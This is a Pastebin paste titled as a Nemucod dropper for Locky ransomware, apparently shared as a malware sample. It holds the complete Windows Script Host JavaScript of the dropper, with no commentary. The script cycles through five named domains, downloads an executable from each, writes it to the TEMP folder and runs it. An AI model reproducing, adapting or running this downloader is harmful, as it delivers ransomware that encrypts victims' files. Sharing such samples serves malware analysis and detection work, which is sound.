Advertisement
Demonslay335

Nemucod Dropper for Locky .osiris

Dec 8th, 2016
454
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.49 KB | None | 0 0
  1. var am = "0.41463003";
  2. var ld = 0;
  3. var cq = String.fromCharCode(34);
  4. var cs = String.fromCharCode(92);
  5. var ll = ["babypbshop.ru", "batux.com.br", "partnerbrasilia.com.br", "www.6c.com.co", "otpugivatel.by"];
  6. var ws = WScript.CreateObject("WScript.Shell");
  7. var fn = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "a";
  8. var xo = WScript.CreateObject("Msxml2.XMLHTTP");
  9. var xa = WScript.CreateObject("ADODB.Stream");
  10. var fo = WScript.CreateObject("Scripting.FileSystemObject");
  11. if (!fo.FileExists(fn + ".txt")) {
  12. var fp = fo.CreateTextFile(fn + ".txt", true);
  13. fp.WriteLine("");
  14. fp.Close();
  15. for (var n = 0; n <= 2; n++) {
  16. for (var i = ld; i < ll.length; i++) {
  17. var dn = 0;
  18. try {
  19. xo.open("GET", "http://" + ll[i] + "/counter/?a=" + am + "&r=" + i + n, false);
  20. xo.send();
  21. if (xo.status == 200) {
  22. xa.open();
  23. xa.type = 1;
  24. xa.write(xo.responseBody);
  25. if (xa.size > 1000) {
  26. dn = 1;
  27. xa.saveToFile(fn + n + ".exe", 2);
  28. try {
  29. ws.Run(fn + n + ".exe", 1, 0);
  30. } catch (er) {};
  31. };
  32. xa.close();
  33. };
  34. if (dn == 1) {
  35. ld = i;
  36. break;
  37. };
  38. } catch (er) {};
  39. };
  40. };
  41. };
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement